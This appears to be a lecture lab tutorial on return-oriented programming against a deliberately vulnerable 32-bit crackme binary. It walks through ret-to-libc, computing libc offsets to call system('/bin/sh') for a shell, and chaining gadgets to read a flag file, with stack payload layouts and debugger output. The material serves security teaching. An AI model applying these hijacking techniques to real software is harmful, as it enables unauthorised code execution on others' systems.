==================================
Lec07: Return-oriented Programming
==================================

In this tutorial, we are going to learn about the basic concept of
return-oriented programming (ROP).

1. Ret-to-libc
==============

To make our tutorial easier, we assume there are code pointer leaks
(i.e., system() and printf() in the libc library).

------------------------------------------------------------
void start() {
  printf("IOLI Crackme Level 0x00\n");
  printf("Password:");

  char buf[32];
  memset(buf, 0, sizeof(buf));
  read(0, buf, 256);
  
  if (!strcmp(buf, "250382"))
    printf("Password OK :)\n");
  else
    printf("Invalid Password!\n");
}

int main(int argc, char *argv[])
{
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stdin, NULL, _IONBF, 0);
  
  void *self = dlopen(NULL, RTLD_NOW);
  printf("stack   : %p\n", &argc);
  printf("system(): %p\n", dlsym(self, "system"));
  printf("printf(): %p\n", dlsym(self, "printf"));

  start();
  
  return 0;
}
------------------------------------------------------------

  $ checksec ./target
   [*] '/home/lab/tut-rop/target'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

Please note that NX is enabled, so you cannot place your shellcode
neither in stack nor heap, but the stack protector is disabled,
allowing us to launch a control hijacking attack.

  $ ./target
  stack   : 0xffea0e00
  system(): 0xf7e5e310
  printf(): 0xf7e6b410
  IOLI Crackme Level 0x00
  Password:

Your first task is to exploit a buffer overflow and print out
"Password OK :)" (How could you find the pointer to "Password OK :)"?)

Your payload should look like this:

  [buf  ]
  [.....]
  [ra   ] -> printf
  [dummy]
  [arg1 ] -> "Password OK :)"

When printf() is invoked, "Password OK :)" will be considered as its
first argument. As this exploit returns to a libc function, this
technique is often called "ret-to-libc".


2. Understanding module
=======================

Let's get a shell out of this vulnerability. To get a shell, we are
going to use the system() function (try, 'man system' if you are
not familiar with).

Like the above payload, you can easily place the pointer to system()
by replacing printf() with system().

  [buf  ]
  [.....]
  [ra   ] -> system
  [dummy]
  [arg1 ] -> "/bin/sh"

But what's the pointer to "/bin/sh"? In fact, typical process memory
(and libc) contain lots of such strings (e.g., various shells). Think
about how the system() function is implemented; it essentially
fork()/execve() on "/bin/sh" with the provided arguments.

gdb-pwndbg provides a pretty easy interface to search a string in the memory:

  $ gdb-pwndbg ./target
  ...
  > search  "/bin"
  libc-2.19.so    0xf7f80d4c das     /* '/bin/sh' */
  libc-2.19.so    0xf7f82790 das     /* '/bin:/usr/bin' */
  libc-2.19.so    0xf7f82799 das     /* '/bin' */
  libc-2.19.so    0xf7f82ccd das     /* '/bin/csh' */
  ...

There are bunch of strings you can pick up for feeding the system()
function as an argument. Note that all pointers should be different
across each execution thanks to ASLR on stack/heap and libraries.

Our goal is to invoke system("/bin/sh"), like this:

  [buf  ]
  [.....]
  [ra   ] -> system (provided: 0xf7e5e310)
  [dummy]
  [arg1 ] -> "/bin/sh" (searched: 0xf7f80d4c)

Unfortunately though, these numbers keep changing. How to infer the
address of "/bin/sh" required for system()? As you've learned from the
'libbase' challenge in Lab06, ASLR does not randomize the offset
inside a module; it just randomizes the base address of the entire module
(why though?)

  0xf7f80d4c (/bin/sh) - 0xf7e5e310 (system) = 0x122a3c

So in your exploit, by using the address of system(), you can calculate
the address of "/bin/sh" (0xf7f80d4c = 0xf7e5e310 + 0x122a3c).

Try?

By the way, where is this magic address (0xf7e5e310, the address of
system()) coming from? In fact, you can easily compute by hand. Try
"vmmap" in PEDA:

  > vmmap
  LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
  0x56555000 0x56556000 r-xp     1000 0      /home/lab06/tut-rop/target
  0x56556000 0x56557000 r--p     1000 0      /home/lab06/tut-rop/target
  0x56557000 0x56558000 rw-p     1000 1000   /home/lab06/tut-rop/target
  0xf7e1d000 0xf7e1e000 rw-p     1000 0      
  0xf7e1e000 0xf7fc9000 r-xp   1ab000 0      /lib/i386-linux-gnu/libc-2.19.so
  0xf7fc9000 0xf7fcb000 r--p     2000 1aa000 /lib/i386-linux-gnu/libc-2.19.so
  0xf7fcb000 0xf7fcc000 rw-p     1000 1ac000 /lib/i386-linux-gnu/libc-2.19.so
  ...

The base address (a mapped region) of libc is '0xf7e1e000'; "x" in
the "r-xp" permission is telling you that's an eXecutable region
(i.e., code).

Then, where is system() in the library itself? As these functions are
exported for external uses, you can parse the elf format like below:

   $ readelf -s /lib/i386-linux-gnu/libc-2.19.so | grep system
   243: 0011b8a0    73 FUNC    GLOBAL DEFAULT   12 svcerr_systemerr@@GLIBC_2.0
   620: 00040310    56 FUNC    GLOBAL DEFAULT   12 __libc_system@@GLIBC_PRIVATE
  1443: 00040310    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0

0x00040310 is the beginning of the system() function inside the libc
library, so its base address plus 0x00040310 should be the address we
observed previously.

  0xf7e1e000 (base) + 0x00040310 (offset) = 0xf7e5e310 (system)

Then, can you calculate the base of the library from the leaked
system()'s address? and what's the offset of "/bin/sh" in the libc
module?


3. Simple ROP
=============

Generating a segfault after exploitation is a bit unfortunate, so
let's make it gracefully terminate after the exploitation. Our plan
is to 'chain' two library calls, like this:

   system("/bin/sh")
   exit(0)

Let's think about what happen when system("/bin/sh") returns; that is,
when you exited the shell (type 'exit' or C-c).

  [buf  ]
  [.....]
  [ra   ] -> system
  [dummy]
  [arg1 ] -> "/bin/sh"

Did you notice that the 'dummy' value is the last ip of the program
crashed? In other words, similar to stack overflows, you can keep
controlling the next return addresses by chaining them. What if we
inject the address to exit() on 'dummy'?

  [buf      ]
  [.....    ]
  [old-ra   ] -> 1) system
  [ra       ] -------------------> 2) exit
  [old-arg1 ] -> 1) "/bin/sh"
  [arg1     ] -> 0

When system() returns, exit() will be invoked; perhaps you can even
control its argument like above (arg1 = 0). 

Try? You should be able to find the address of exit() like previous
example.

Unfortunately, this chaining scheme will stop after the second
calls. In this week, you will be learning more generic, powerful
techniques to keep maintaining your payloads, so called
return-oriented programming (ROP).

Think about:

  [buf      ]
  [.....    ]
  [old-ra   ] -> 1) func1
  [ra       ] -------------------> 2) func2
  [old-arg1 ] -> 1) arg1
  [arg1     ] -> arg1

After func2(arg1), 'old-arg1' will be our next return address in this
payload. Here comes a nit trick, a pop/ret gadget.

  [buf      ]
  [.....    ]
  [old-ra   ] -> 1) func1
  [ra       ] ------------------> pop/ret gadget
  [old-arg1 ] -> 1) arg1
  [ra       ] -> func2
  [dummy    ] 
  [arg1     ] -> arg1

In this case, after func1(arg1), it returns to 'pop/ret' instructions,
which 1) pop 'old-arg1' and 2) return to func2 (again!).

Although 'pop/ret' gadgets are everywhere (check any function!), there
is a useful tool to search all interesting gadgets for you.

  $ ropper -f ./target 
  ....
  0x0804901e: pop ebx; ret;
  ....

By using this 'gadget', we can keep chaining multiple functions
together like this:

  [buf      ]
  [.....    ]
  [old-ra   ] -> 1) func1
  [ra       ] ------------------> pop/ret gadget
  [old-arg1 ] -> 1) arg1
  [ra       ] -> func2
  [ra       ] ------------------> pop/pop/ret gadget
  [arg1     ] -> arg1
  [arg2     ] -> arg2
  [ra       ] ...

To invoke:

  func1(arg1)
  func2(arg1, arg2)

Try to invoke:

  printf("Password OK :)")
  system("/bin/sh")
  exit(0)

In fact, this is just basic idea. After executing 'pop ebx; ret;', you
are now controlling the value on a register (ebx = arg1), which means
you can do bunch of other things (e.g., invoking system calls). Not
surprisingly, this kind of techniques turn out to be turning complete
(see, our reference).

You know what? All gadgets are ended with "ret" so called
"return"-oriented programming.

4. Simple ROP
=============

Your job today is to chain a ROP payload:

  open("/proc/flag", O_RDONLY)
  read(3, tmp, 1024)
  write(1, tmp, 1024)

More specifically, prepare the payload:

  [buf      ]
  [.....    ]
  [ra       ] -> 1) open
  [pop2     ] --------------------> pop/pop/ret
  [arg1     ] -> "/proc/flag"
  [arg2     ] -> 0 (O_RDONLY)
  [ra       ] -> 2) read
  [pop3     ] ------------------> pop/pop/pop/ret
  [arg1     ] -> 3 (new fd)
  [arg2     ] -> tmp
  [arg3     ] -> 1024
  [ra       ] -> 3) write
  [dummy    ]
  [arg1     ] -> 1 (stdout)
  [arg2     ] -> tmp
  [arg3     ] -> 1024

1) tmp? Any writable place in the program? (i.e., check vmmap)
2) "/proc/flag"? Any place you can inject such a string in the stack
   as part of your buffer input (i.e., use "stack")

Please exploit ./target-seccomp with your payload and submit the flag!